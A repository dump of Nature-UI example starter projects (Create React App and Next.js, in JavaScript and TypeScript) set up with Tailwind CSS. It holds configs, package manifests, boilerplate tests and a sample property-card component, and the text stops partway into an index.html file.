├── cra-16 ├── .gitignore ├── public │ ├── robots.txt │ ├── favicon.ico │ ├── logo192.png │ ├── logo512.png │ ├── manifest.json │ └── index.html ├── postcss.config.js ├── src │ ├── setupTests.js │ ├── index.js │ ├── App.test.js │ ├── reportWebVitals.js │ ├── index.css │ ├── App.js │ └── logo.svg ├── .eslintcache ├── package.json ├── README.md └── tailwind.config.js ├── .gitignore ├── create-react-app ├── src │ ├── react-app-env.d.ts │ ├── App.css │ ├── setupTests.ts │ ├── App.test.tsx │ ├── index.css │ ├── reportWebVitals.ts │ ├── index.tsx │ ├── App.tsx │ └── logo.svg ├── public │ ├── robots.txt │ ├── favicon.ico │ ├── logo192.png │ ├── logo512.png │ ├── manifest.json │ └── index.html ├── postcss.config.js ├── tailwind.config.js ├── .gitignore ├── tsconfig.json ├── .eslintcache ├── package.json └── README.md ├── next-js ├── styles │ └── globals.css ├── public │ ├── favicon.ico │ └── vercel.svg ├── pages │ ├── _app.js │ ├── api │ │ └── hello.js │ └── index.js ├── postcss.config.js ├── tailwind.config.js ├── package.json ├── .gitignore └── README.md └── next-js-typescript ├── next-env.d.ts ├── postcss.config.js ├── public ├── favicon │ ├── favicon.ico │ ├── favicon-16x16.png │ ├── favicon-32x32.png │ ├── mstile-150x150.png │ ├── apple-touch-icon.png │ ├── android-chrome-192x192.png │ ├── android-chrome-512x512.png │ ├── browserconfig.xml │ ├── site.webmanifest │ └── safari-pinned-tab.svg └── assets │ └── blog │ ├── authors │ ├── jj.jpeg │ ├── joe.jpeg │ └── tim.jpeg │ ├── preview │ └── cover.jpg │ ├── hello-world │ └── cover.jpg │ └── dynamic-routing │ └── cover.jpg ├── tailwind.config.js ├── pages ├── _app.tsx ├── _document.tsx └── index.tsx ├── styles └── index.css ├── .gitignore ├── tsconfig.json ├── package.json └── README.md /cra-16/.gitignore: -------------------------------------------------------------------------------- 1 | node_modules 2 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | node_modules 2 | node_modules/ 3 | tailwindcss -------------------------------------------------------------------------------- /create-react-app/src/react-app-env.d.ts: -------------------------------------------------------------------------------- 1 | /// 2 | -------------------------------------------------------------------------------- /next-js/styles/globals.css: -------------------------------------------------------------------------------- 1 | @tailwind base; 2 | @tailwind components; 3 | @tailwind utilities; 4 | -------------------------------------------------------------------------------- /cra-16/public/robots.txt: -------------------------------------------------------------------------------- 1 | # https://www.robotstxt.org/robotstxt.html 2 | User-agent: * 3 | Disallow: 4 | -------------------------------------------------------------------------------- /cra-16/public/favicon.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Nature-UI/examples/HEAD/cra-16/public/favicon.ico -------------------------------------------------------------------------------- /cra-16/public/logo192.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Nature-UI/examples/HEAD/cra-16/public/logo192.png -------------------------------------------------------------------------------- /cra-16/public/logo512.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Nature-UI/examples/HEAD/cra-16/public/logo512.png -------------------------------------------------------------------------------- /next-js/public/favicon.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Nature-UI/examples/HEAD/next-js/public/favicon.ico -------------------------------------------------------------------------------- /create-react-app/public/robots.txt: -------------------------------------------------------------------------------- 1 | # https://www.robotstxt.org/robotstxt.html 2 | User-agent: * 3 | Disallow: 4 | -------------------------------------------------------------------------------- /create-react-app/src/App.css: -------------------------------------------------------------------------------- 1 | @tailwind base; 2 | 3 | @tailwind components; 4 | 5 | @tailwind utilities; 6 | -------------------------------------------------------------------------------- /next-js-typescript/next-env.d.ts: -------------------------------------------------------------------------------- 1 | /// 2 | /// 3 | -------------------------------------------------------------------------------- /create-react-app/public/favicon.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Nature-UI/examples/HEAD/create-react-app/public/favicon.ico -------------------------------------------------------------------------------- /create-react-app/public/logo192.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Nature-UI/examples/HEAD/create-react-app/public/logo192.png -------------------------------------------------------------------------------- /create-react-app/public/logo512.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Nature-UI/examples/HEAD/create-react-app/public/logo512.png -------------------------------------------------------------------------------- /next-js-typescript/postcss.config.js: -------------------------------------------------------------------------------- 1 | module.exports = { 2 | plugins: { 3 | tailwindcss: {}, 4 | autoprefixer: {}, 5 | }, 6 | } 7 | -------------------------------------------------------------------------------- /next-js-typescript/public/favicon/favicon.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Nature-UI/examples/HEAD/next-js-typescript/public/favicon/favicon.ico -------------------------------------------------------------------------------- /next-js-typescript/public/favicon/favicon-16x16.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Nature-UI/examples/HEAD/next-js-typescript/public/favicon/favicon-16x16.png -------------------------------------------------------------------------------- /next-js-typescript/public/favicon/favicon-32x32.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Nature-UI/examples/HEAD/next-js-typescript/public/favicon/favicon-32x32.png -------------------------------------------------------------------------------- /next-js-typescript/public/favicon/mstile-150x150.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Nature-UI/examples/HEAD/next-js-typescript/public/favicon/mstile-150x150.png -------------------------------------------------------------------------------- /next-js-typescript/public/assets/blog/authors/jj.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Nature-UI/examples/HEAD/next-js-typescript/public/assets/blog/authors/jj.jpeg -------------------------------------------------------------------------------- /next-js-typescript/public/assets/blog/authors/joe.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Nature-UI/examples/HEAD/next-js-typescript/public/assets/blog/authors/joe.jpeg -------------------------------------------------------------------------------- /next-js-typescript/public/assets/blog/authors/tim.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Nature-UI/examples/HEAD/next-js-typescript/public/assets/blog/authors/tim.jpeg -------------------------------------------------------------------------------- /next-js-typescript/public/favicon/apple-touch-icon.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Nature-UI/examples/HEAD/next-js-typescript/public/favicon/apple-touch-icon.png -------------------------------------------------------------------------------- /next-js-typescript/public/assets/blog/preview/cover.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Nature-UI/examples/HEAD/next-js-typescript/public/assets/blog/preview/cover.jpg -------------------------------------------------------------------------------- /cra-16/postcss.config.js: -------------------------------------------------------------------------------- 1 | module.exports = { 2 | plugins: [ 3 | // ... 4 | require('tailwindcss'), 5 | // require('autoprefixer'), 6 | // ... 7 | ] 8 | } -------------------------------------------------------------------------------- /next-js-typescript/public/assets/blog/hello-world/cover.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Nature-UI/examples/HEAD/next-js-typescript/public/assets/blog/hello-world/cover.jpg -------------------------------------------------------------------------------- /next-js-typescript/public/favicon/android-chrome-192x192.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Nature-UI/examples/HEAD/next-js-typescript/public/favicon/android-chrome-192x192.png -------------------------------------------------------------------------------- /next-js-typescript/public/favicon/android-chrome-512x512.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Nature-UI/examples/HEAD/next-js-typescript/public/favicon/android-chrome-512x512.png -------------------------------------------------------------------------------- /create-react-app/postcss.config.js: -------------------------------------------------------------------------------- 1 | module.exports = { 2 | plugins: [ 3 | // ... 4 | require('tailwindcss'), 5 | // require('autoprefixer'), 6 | // ... 7 | ] 8 | } -------------------------------------------------------------------------------- /next-js-typescript/public/assets/blog/dynamic-routing/cover.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Nature-UI/examples/HEAD/next-js-typescript/public/assets/blog/dynamic-routing/cover.jpg -------------------------------------------------------------------------------- /next-js/pages/_app.js: -------------------------------------------------------------------------------- 1 | import '../styles/globals.css' 2 | 3 | function MyApp({ Component, pageProps }) { 4 | return 5 | } 6 | 7 | export default MyApp 8 | -------------------------------------------------------------------------------- /next-js-typescript/tailwind.config.js: -------------------------------------------------------------------------------- 1 | module.exports = { 2 | purge: ['./pages/**/*.tsx'], 3 | purge: false, 4 | theme: { 5 | extend: { 6 | 7 | }, 8 | } 9 | } 10 | -------------------------------------------------------------------------------- /next-js/pages/api/hello.js: -------------------------------------------------------------------------------- 1 | // Next.js API route support: https://nextjs.org/docs/api-routes/introduction 2 | 3 | export default function helloAPI(req, res) { 4 | res.statusCode = 200 5 | res.json({ name: 'John Doe' }) 6 | } 7 | -------------------------------------------------------------------------------- /next-js/postcss.config.js: -------------------------------------------------------------------------------- 1 | // If you want to use other PostCSS plugins, see the following: 2 | // https://tailwindcss.com/docs/using-with-preprocessors 3 | module.exports = { 4 | plugins: { 5 | tailwindcss: {}, 6 | autoprefixer: {}, 7 | }, 8 | } 9 | -------------------------------------------------------------------------------- /next-js-typescript/pages/_app.tsx: -------------------------------------------------------------------------------- 1 | import { AppProps } from 'next/app'; 2 | // import '../styles/index.css' 3 | import 'tailwindcss/tailwind.css'; 4 | 5 | export default function MyApp({ Component, pageProps }: AppProps) { 6 | return ; 7 | } 8 | -------------------------------------------------------------------------------- /cra-16/src/setupTests.js: -------------------------------------------------------------------------------- 1 | // jest-dom adds custom jest matchers for asserting on DOM nodes. 2 | // allows you to do things like: 3 | // expect(element).toHaveTextContent(/react/i) 4 | // learn more: https://github.com/testing-library/jest-dom 5 | import '@testing-library/jest-dom'; 6 | -------------------------------------------------------------------------------- /cra-16/src/index.js: -------------------------------------------------------------------------------- 1 | import React from 'react'; 2 | import ReactDOM from 'react-dom'; 3 | import App from './App'; 4 | import './output.css'; 5 | 6 | ReactDOM.render( 7 | 8 | 9 | , 10 | document.getElementById('root') 11 | ); -------------------------------------------------------------------------------- /create-react-app/src/setupTests.ts: -------------------------------------------------------------------------------- 1 | // jest-dom adds custom jest matchers for asserting on DOM nodes. 2 | // allows you to do things like: 3 | // expect(element).toHaveTextContent(/react/i) 4 | // learn more: https://github.com/testing-library/jest-dom 5 | import '@testing-library/jest-dom'; 6 | -------------------------------------------------------------------------------- /cra-16/src/App.test.js: -------------------------------------------------------------------------------- 1 | import { render, screen } from '@testing-library/react'; 2 | import App from './App'; 3 | 4 | test('renders learn react link', () => { 5 | render(); 6 | const linkElement = screen.getByText(/learn react/i); 7 | expect(linkElement).toBeInTheDocument(); 8 | }); 9 | -------------------------------------------------------------------------------- /next-js/tailwind.config.js: -------------------------------------------------------------------------------- 1 | module.exports = { 2 | purge: ['./pages/**/*.{js,ts,jsx,tsx}', './components/**/*.{js,ts,jsx,tsx}'], 3 | darkMode: false, // or 'media' or 'class' 4 | theme: { 5 | extend: {}, 6 | }, 7 | variants: { 8 | extend: {}, 9 | }, 10 | plugins: [], 11 | } 12 | -------------------------------------------------------------------------------- /create-react-app/tailwind.config.js: -------------------------------------------------------------------------------- 1 | module.exports = { 2 | purge: [ 3 | "src/**/*.tsx" 4 | ], 5 | darkMode: false, // or 'media' or 'class' 6 | theme: { 7 | extend: { 8 | color: { 9 | "orange-500": "#dd6b20" 10 | } 11 | }, 12 | }, 13 | variants: { 14 | extend: {}, 15 | }, 16 | } 17 | -------------------------------------------------------------------------------- /create-react-app/src/App.test.tsx: -------------------------------------------------------------------------------- 1 | import React from 'react'; 2 | import { render, screen } from '@testing-library/react'; 3 | import App from './App'; 4 | 5 | test('renders learn react link', () => { 6 | render(); 7 | const linkElement = screen.getByText(/learn react/i); 8 | expect(linkElement).toBeInTheDocument(); 9 | }); 10 | -------------------------------------------------------------------------------- /next-js-typescript/public/favicon/browserconfig.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | #000000 7 | 8 | 9 | 10 | -------------------------------------------------------------------------------- /next-js-typescript/styles/index.css: -------------------------------------------------------------------------------- 1 | @tailwind base; 2 | 3 | /* Write your own custom base styles here */ 4 | 5 | /* Start purging... */ 6 | @tailwind components; 7 | /* Stop purging. */ 8 | 9 | /* Write you own custom component styles here */ 10 | 11 | /* Start purging... */ 12 | @tailwind utilities; 13 | /* Stop purging. */ 14 | 15 | /* Your own custom utilities */ 16 | -------------------------------------------------------------------------------- /next-js-typescript/pages/_document.tsx: -------------------------------------------------------------------------------- 1 | import Document, { Html, Head, Main, NextScript } from 'next/document' 2 | 3 | export default class MyDocument extends Document { 4 | render() { 5 | return ( 6 | 7 | 8 | 9 |
10 | 11 | 12 | 13 | ) 14 | } 15 | } 16 | -------------------------------------------------------------------------------- /create-react-app/.gitignore: -------------------------------------------------------------------------------- 1 | # See https://help.github.com/articles/ignoring-files/ for more about ignoring files. 2 | 3 | # dependencies 4 | /node_modules 5 | /.pnp 6 | .pnp.js 7 | 8 | # testing 9 | /coverage 10 | 11 | # production 12 | /build 13 | 14 | # misc 15 | .DS_Store 16 | .env.local 17 | .env.development.local 18 | .env.test.local 19 | .env.production.local 20 | 21 | npm-debug.log* 22 | yarn-debug.log* 23 | yarn-error.log* 24 | -------------------------------------------------------------------------------- /cra-16/src/reportWebVitals.js: -------------------------------------------------------------------------------- 1 | const reportWebVitals = onPerfEntry => { 2 | if (onPerfEntry && onPerfEntry instanceof Function) { 3 | import('web-vitals').then(({ getCLS, getFID, getFCP, getLCP, getTTFB }) => { 4 | getCLS(onPerfEntry); 5 | getFID(onPerfEntry); 6 | getFCP(onPerfEntry); 7 | getLCP(onPerfEntry); 8 | getTTFB(onPerfEntry); 9 | }); 10 | } 11 | }; 12 | 13 | export default reportWebVitals; 14 | -------------------------------------------------------------------------------- /create-react-app/src/index.css: -------------------------------------------------------------------------------- 1 | body { 2 | margin: 0; 3 | font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', 'Roboto', 'Oxygen', 4 | 'Ubuntu', 'Cantarell', 'Fira Sans', 'Droid Sans', 'Helvetica Neue', 5 | sans-serif; 6 | -webkit-font-smoothing: antialiased; 7 | -moz-osx-font-smoothing: grayscale; 8 | } 9 | 10 | code { 11 | font-family: source-code-pro, Menlo, Monaco, Consolas, 'Courier New', 12 | monospace; 13 | } 14 | -------------------------------------------------------------------------------- /cra-16/src/index.css: -------------------------------------------------------------------------------- 1 | @tailwind base; 2 | 3 | @tailwind components; 4 | 5 | @tailwind utilities; 6 | body { 7 | margin: 0; 8 | font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', 'Roboto', 'Oxygen', 9 | 'Ubuntu', 'Cantarell', 'Fira Sans', 'Droid Sans', 'Helvetica Neue', 10 | sans-serif; 11 | -webkit-font-smoothing: antialiased; 12 | -moz-osx-font-smoothing: grayscale; 13 | } 14 | 15 | code { 16 | font-family: source-code-pro, Menlo, Monaco, Consolas, 'Courier New', 17 | monospace; 18 | } 19 | -------------------------------------------------------------------------------- /next-js-typescript/public/favicon/site.webmanifest: -------------------------------------------------------------------------------- 1 | { 2 | "name": "Next.js", 3 | "short_name": "Next.js", 4 | "icons": [ 5 | { 6 | "src": "/favicons/android-chrome-192x192.png", 7 | "sizes": "192x192", 8 | "type": "image/png" 9 | }, 10 | { 11 | "src": "/favicons/android-chrome-512x512.png", 12 | "sizes": "512x512", 13 | "type": "image/png" 14 | } 15 | ], 16 | "theme_color": "#000000", 17 | "background_color": "#000000", 18 | "display": "standalone" 19 | } 20 | -------------------------------------------------------------------------------- /create-react-app/src/reportWebVitals.ts: -------------------------------------------------------------------------------- 1 | import { ReportHandler } from 'web-vitals'; 2 | 3 | const reportWebVitals = (onPerfEntry?: ReportHandler) => { 4 | if (onPerfEntry && onPerfEntry instanceof Function) { 5 | import('web-vitals').then(({ getCLS, getFID, getFCP, getLCP, getTTFB }) => { 6 | getCLS(onPerfEntry); 7 | getFID(onPerfEntry); 8 | getFCP(onPerfEntry); 9 | getLCP(onPerfEntry); 10 | getTTFB(onPerfEntry); 11 | }); 12 | } 13 | }; 14 | 15 | export default reportWebVitals; 16 | -------------------------------------------------------------------------------- /next-js/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "with-tailwindcss", 3 | "version": "0.1.0", 4 | "private": true, 5 | "scripts": { 6 | "dev": "next dev", 7 | "build": "next build", 8 | "start": "next start" 9 | }, 10 | "dependencies": { 11 | "@nature-ui/core": "^1.1.1", 12 | "@nature-ui/icons": "^1.1.1", 13 | "autoprefixer": "^10.0.4", 14 | "next": "latest", 15 | "postcss": "^8.1.10", 16 | "react": "^16.13.1", 17 | "react-dom": "^16.13.1", 18 | "tailwindcss": "^2.0.2" 19 | } 20 | } 21 | -------------------------------------------------------------------------------- /next-js/.gitignore: -------------------------------------------------------------------------------- 1 | # See https://help.github.com/articles/ignoring-files/ for more about ignoring files. 2 | 3 | # dependencies 4 | /node_modules 5 | /.pnp 6 | .pnp.js 7 | 8 | # testing 9 | /coverage 10 | 11 | # next.js 12 | /.next/ 13 | /out/ 14 | 15 | # production 16 | /build 17 | 18 | # misc 19 | .DS_Store 20 | *.pem 21 | 22 | # debug 23 | npm-debug.log* 24 | yarn-debug.log* 25 | yarn-error.log* 26 | 27 | # local env files 28 | .env.local 29 | .env.development.local 30 | .env.test.local 31 | .env.production.local 32 | 33 | # vercel 34 | .vercel 35 | -------------------------------------------------------------------------------- /next-js-typescript/.gitignore: -------------------------------------------------------------------------------- 1 | # See https://help.github.com/articles/ignoring-files/ for more about ignoring files. 2 | 3 | # dependencies 4 | /node_modules 5 | /.pnp 6 | .pnp.js 7 | 8 | # testing 9 | /coverage 10 | 11 | # next.js 12 | /.next/ 13 | /out/ 14 | 15 | # production 16 | /build 17 | 18 | # misc 19 | .DS_Store 20 | *.pem 21 | 22 | # debug 23 | npm-debug.log* 24 | yarn-debug.log* 25 | yarn-error.log* 26 | 27 | # local env files 28 | .env.local 29 | .env.development.local 30 | .env.test.local 31 | .env.production.local 32 | 33 | # vercel 34 | .vercel 35 | -------------------------------------------------------------------------------- /next-js-typescript/tsconfig.json: -------------------------------------------------------------------------------- 1 | { 2 | "compilerOptions": { 3 | "target": "es5", 4 | "module": "esnext", 5 | "jsx": "preserve", 6 | "strict": true, 7 | "esModuleInterop": true, 8 | "skipLibCheck": true, 9 | "forceConsistentCasingInFileNames": true, 10 | "lib": ["dom", "dom.iterable", "esnext"], 11 | "allowJs": true, 12 | "noEmit": true, 13 | "moduleResolution": "node", 14 | "resolveJsonModule": true, 15 | "isolatedModules": true 16 | }, 17 | "exclude": ["node_modules"], 18 | "include": ["next-env.d.ts", "**/*.ts", "**/*.tsx"] 19 | } 20 | -------------------------------------------------------------------------------- /create-react-app/src/index.tsx: -------------------------------------------------------------------------------- 1 | import React from 'react'; 2 | import ReactDOM from 'react-dom'; 3 | import './index.css'; 4 | import App from './App'; 5 | import reportWebVitals from './reportWebVitals'; 6 | 7 | ReactDOM.render( 8 | 9 | 10 | , 11 | document.getElementById('root') 12 | ); 13 | 14 | // If you want to start measuring performance in your app, pass a function 15 | // to log results (for example: reportWebVitals(console.log)) 16 | // or send to an analytics endpoint. Learn more: https://bit.ly/CRA-vitals 17 | reportWebVitals(); 18 | -------------------------------------------------------------------------------- /cra-16/public/manifest.json: -------------------------------------------------------------------------------- 1 | { 2 | "short_name": "React App", 3 | "name": "Create React App Sample", 4 | "icons": [ 5 | { 6 | "src": "favicon.ico", 7 | "sizes": "64x64 32x32 24x24 16x16", 8 | "type": "image/x-icon" 9 | }, 10 | { 11 | "src": "logo192.png", 12 | "type": "image/png", 13 | "sizes": "192x192" 14 | }, 15 | { 16 | "src": "logo512.png", 17 | "type": "image/png", 18 | "sizes": "512x512" 19 | } 20 | ], 21 | "start_url": ".", 22 | "display": "standalone", 23 | "theme_color": "#000000", 24 | "background_color": "#ffffff" 25 | } 26 | -------------------------------------------------------------------------------- /create-react-app/public/manifest.json: -------------------------------------------------------------------------------- 1 | { 2 | "short_name": "React App", 3 | "name": "Create React App Sample", 4 | "icons": [ 5 | { 6 | "src": "favicon.ico", 7 | "sizes": "64x64 32x32 24x24 16x16", 8 | "type": "image/x-icon" 9 | }, 10 | { 11 | "src": "logo192.png", 12 | "type": "image/png", 13 | "sizes": "192x192" 14 | }, 15 | { 16 | "src": "logo512.png", 17 | "type": "image/png", 18 | "sizes": "512x512" 19 | } 20 | ], 21 | "start_url": ".", 22 | "display": "standalone", 23 | "theme_color": "#000000", 24 | "background_color": "#ffffff" 25 | } 26 | -------------------------------------------------------------------------------- /create-react-app/tsconfig.json: -------------------------------------------------------------------------------- 1 | { 2 | "compilerOptions": { 3 | "target": "es5", 4 | "lib": [ 5 | "dom", 6 | "dom.iterable", 7 | "esnext" 8 | ], 9 | "allowJs": true, 10 | "skipLibCheck": true, 11 | "esModuleInterop": true, 12 | "allowSyntheticDefaultImports": true, 13 | "strict": true, 14 | "forceConsistentCasingInFileNames": true, 15 | "noFallthroughCasesInSwitch": true, 16 | "module": "esnext", 17 | "moduleResolution": "node", 18 | "resolveJsonModule": true, 19 | "isolatedModules": true, 20 | "noEmit": true, 21 | "jsx": "react-jsx" 22 | }, 23 | "include": [ 24 | "src" 25 | ] 26 | } 27 | -------------------------------------------------------------------------------- /next-js-typescript/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "blog-starter-typescript", 3 | "version": "1.0.0", 4 | "scripts": { 5 | "dev": "next", 6 | "build": "next build", 7 | "start": "next start", 8 | "typecheck": "tsc" 9 | }, 10 | "dependencies": { 11 | "@nature-ui/core": "^1.1.1", 12 | "@nature-ui/icons": "^1.1.1", 13 | "classnames": "2.2.6", 14 | "date-fns": "2.10.0", 15 | "gray-matter": "4.0.2", 16 | "next": "latest", 17 | "react": "^16.13.0", 18 | "react-dom": "^16.13.0", 19 | "remark": "11.0.2", 20 | "remark-html": "10.0.0", 21 | "typescript": "^4.0.3" 22 | }, 23 | "devDependencies": { 24 | "@types/classnames": "^2.2.10", 25 | "@types/jest": "^25.2.2", 26 | "@types/node": "^14.0.1", 27 | "@types/react": "^16.9.35", 28 | "@types/react-dom": "^16.9.8", 29 | "autoprefixer": "^10.2.1", 30 | "postcss": "^8.2.4", 31 | "tailwindcss": "^2.0.2" 32 | }, 33 | "license": "MIT" 34 | } 35 | -------------------------------------------------------------------------------- /cra-16/.eslintcache: -------------------------------------------------------------------------------- 1 | [{"/home/dnature/Documents/projects/AAK/nature-ui-examples/cra-16/src/App.js":"1","/home/dnature/Documents/projects/AAK/nature-ui-examples/cra-16/src/reportWebVitals.js":"2","/home/dnature/Documents/projects/AAK/nature-ui-examples/cra-16/src/index.js":"3"},{"size":1749,"mtime":1641996851933,"results":"4","hashOfConfig":"5"},{"size":362,"mtime":1641996851945,"results":"6","hashOfConfig":"5"},{"size":219,"mtime":1641997433627,"results":"7","hashOfConfig":"5"},{"filePath":"8","messages":"9","errorCount":0,"warningCount":0,"fixableErrorCount":0,"fixableWarningCount":0},"aenec3",{"filePath":"10","messages":"11","errorCount":0,"warningCount":0,"fixableErrorCount":0,"fixableWarningCount":0},{"filePath":"12","messages":"13","errorCount":0,"warningCount":0,"fixableErrorCount":0,"fixableWarningCount":0},"/home/dnature/Documents/projects/AAK/nature-ui-examples/cra-16/src/App.js",[],"/home/dnature/Documents/projects/AAK/nature-ui-examples/cra-16/src/reportWebVitals.js",[],"/home/dnature/Documents/projects/AAK/nature-ui-examples/cra-16/src/index.js",[]] -------------------------------------------------------------------------------- /next-js/public/vercel.svg: -------------------------------------------------------------------------------- 1 | 3 | 4 | -------------------------------------------------------------------------------- /create-react-app/.eslintcache: -------------------------------------------------------------------------------- 1 | [{"/home/divine/Documents/projects/open-source-ideas/examples/create-react-app/src/index.tsx":"1","/home/divine/Documents/projects/open-source-ideas/examples/create-react-app/src/App.tsx":"2","/home/divine/Documents/projects/open-source-ideas/examples/create-react-app/src/reportWebVitals.ts":"3"},{"size":500,"mtime":1611760052689,"results":"4","hashOfConfig":"5"},{"size":1645,"mtime":1612002450997,"results":"6","hashOfConfig":"5"},{"size":425,"mtime":1611760052689,"results":"7","hashOfConfig":"5"},{"filePath":"8","messages":"9","errorCount":0,"warningCount":0,"fixableErrorCount":0,"fixableWarningCount":0},"1adkgc5",{"filePath":"10","messages":"11","errorCount":0,"warningCount":0,"fixableErrorCount":0,"fixableWarningCount":0},{"filePath":"12","messages":"13","errorCount":0,"warningCount":0,"fixableErrorCount":0,"fixableWarningCount":0},"/home/divine/Documents/projects/open-source-ideas/examples/create-react-app/src/index.tsx",[],"/home/divine/Documents/projects/open-source-ideas/examples/create-react-app/src/App.tsx",[],"/home/divine/Documents/projects/open-source-ideas/examples/create-react-app/src/reportWebVitals.ts",[]] -------------------------------------------------------------------------------- /cra-16/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "nature-ui_cra-16", 3 | "version": "0.1.0", 4 | "private": true, 5 | "dependencies": { 6 | "@emotion/babel-preset-css-prop": "^11.0.0", 7 | "@nature-ui/core": "^1.3.0", 8 | "@nature-ui/icons": "^1.1.1", 9 | "@reach/router": "^1.3.4", 10 | "@testing-library/jest-dom": "^5.11.4", 11 | "@testing-library/react": "^11.1.0", 12 | "@testing-library/user-event": "^12.1.10", 13 | "react": "^16.13.1", 14 | "react-dom": "^16.13.1", 15 | "react-scripts": "4.0.1" 16 | }, 17 | "scripts": { 18 | "start": "react-scripts start", 19 | "build": "react-scripts build", 20 | "test": "react-scripts test", 21 | "eject": "react-scripts eject" 22 | }, 23 | "eslintConfig": { 24 | "extends": [ 25 | "react-app", 26 | "react-app/jest" 27 | ] 28 | }, 29 | "browserslist": { 30 | "production": [ 31 | ">0.2%", 32 | "not dead", 33 | "not op_mini all" 34 | ], 35 | "development": [ 36 | "last 1 chrome version", 37 | "last 1 firefox version", 38 | "last 1 safari version" 39 | ] 40 | }, 41 | "devDependencies": { 42 | "postcss": "^8.2.1", 43 | "tailwindcss": "^3.0.13" 44 | } 45 | } 46 | -------------------------------------------------------------------------------- /next-js-typescript/pages/index.tsx: -------------------------------------------------------------------------------- 1 | import React from 'react'; 2 | import { Badge, Box } from '@nature-ui/layout'; 3 | import { Image } from '@nature-ui/image'; 4 | import { IconButton } from '@nature-ui/button'; 5 | import { Hi } from '@nature-ui/icons'; 6 | 7 | const Index = () => { 8 | return ( 9 |
10 |
11 | Two-storey mansion 16 | 21 | 22 | New 23 | 24 | 25 | } /> 26 | 27 |
28 | 29 |

$32,000/month

30 |

Two-storey mansion

31 |

ave, Soborna, 25

32 |
33 |
34 | ); 35 | }; 36 | 37 | export default Index; 38 | -------------------------------------------------------------------------------- /create-react-app/src/App.tsx: -------------------------------------------------------------------------------- 1 | import React from 'react'; 2 | import { Badge, Box } from '@nature-ui/layout'; 3 | import { Image } from '@nature-ui/image'; 4 | import { IconButton } from '@nature-ui/button'; 5 | import { Hi } from '@nature-ui/icons'; 6 | 7 | import './tailwind.css'; 8 | 9 | function App() { 10 | return ( 11 |
12 |
13 | Two-storey mansion 18 | 23 | 24 | New 25 | 26 | 27 | } /> 28 | 29 |
30 | 31 |

$32,000/month

32 |

Two-storey mansion

33 |

ave, Soborna, 25

34 |
35 |
36 | ); 37 | } 38 | 39 | export default App; 40 | -------------------------------------------------------------------------------- /next-js/README.md: -------------------------------------------------------------------------------- 1 | # Next.js + Tailwind CSS Example 2 | 3 | This example shows how to use [Tailwind CSS](https://tailwindcss.com/) (v2) with Next.js. It follows the steps outlined in the official [Tailwind docs](https://tailwindcss.com/docs/guides/nextjs). 4 | 5 | ## Deploy your own 6 | 7 | Deploy the example using [Vercel](https://vercel.com?utm_source=github&utm_medium=readme&utm_campaign=next-example): 8 | 9 | [![Deploy with Vercel](https://vercel.com/button)](https://vercel.com/new/git/external?repository-url=https://github.com/vercel/next.js/tree/canary/examples/with-tailwindcss&project-name=with-tailwindcss&repository-name=with-tailwindcss) 10 | 11 | ## How to use 12 | 13 | Execute [`create-next-app`](https://github.com/vercel/next.js/tree/canary/packages/create-next-app) with [npm](https://docs.npmjs.com/cli/init) or [Yarn](https://yarnpkg.com/lang/en/docs/cli/create/) to bootstrap the example: 14 | 15 | ```bash 16 | npx create-next-app --example with-tailwindcss with-tailwindcss-app 17 | # or 18 | yarn create next-app --example with-tailwindcss with-tailwindcss-app 19 | ``` 20 | 21 | Deploy it to the cloud with [Vercel](https://vercel.com/new?utm_source=github&utm_medium=readme&utm_campaign=next-example) ([Documentation](https://nextjs.org/docs/deployment)). 22 | -------------------------------------------------------------------------------- /create-react-app/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "nature-ui_cra-typescript", 3 | "version": "0.1.0", 4 | "private": true, 5 | "dependencies": { 6 | "@nature-ui/core": "^1.1.1", 7 | "@nature-ui/icons": "^1.1.1", 8 | "@testing-library/jest-dom": "^5.11.4", 9 | "@testing-library/react": "^11.1.0", 10 | "@testing-library/user-event": "^12.1.10", 11 | "@types/jest": "^26.0.15", 12 | "@types/node": "^12.0.0", 13 | "@types/react": "^16.9.53", 14 | "@types/react-dom": "^16.9.8", 15 | "react": "^17.0.1", 16 | "react-dom": "^17.0.1", 17 | "react-scripts": "4.0.1", 18 | "typescript": "^4.0.3", 19 | "web-vitals": "^0.2.4" 20 | }, 21 | "scripts": { 22 | "start": "react-scripts start", 23 | "build": "react-scripts build", 24 | "test": "react-scripts test", 25 | "eject": "react-scripts eject" 26 | }, 27 | "eslintConfig": { 28 | "extends": [ 29 | "react-app", 30 | "react-app/jest" 31 | ] 32 | }, 33 | "browserslist": { 34 | "production": [ 35 | ">0.2%", 36 | "not dead", 37 | "not op_mini all" 38 | ], 39 | "development": [ 40 | "last 1 chrome version", 41 | "last 1 firefox version", 42 | "last 1 safari version" 43 | ] 44 | }, 45 | "devDependencies": { 46 | "autoprefixer": "^10.2.3", 47 | "postcss": "^8.2.4", 48 | "tailwindcss": "^2.0.2" 49 | } 50 | } 51 | -------------------------------------------------------------------------------- /cra-16/public/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 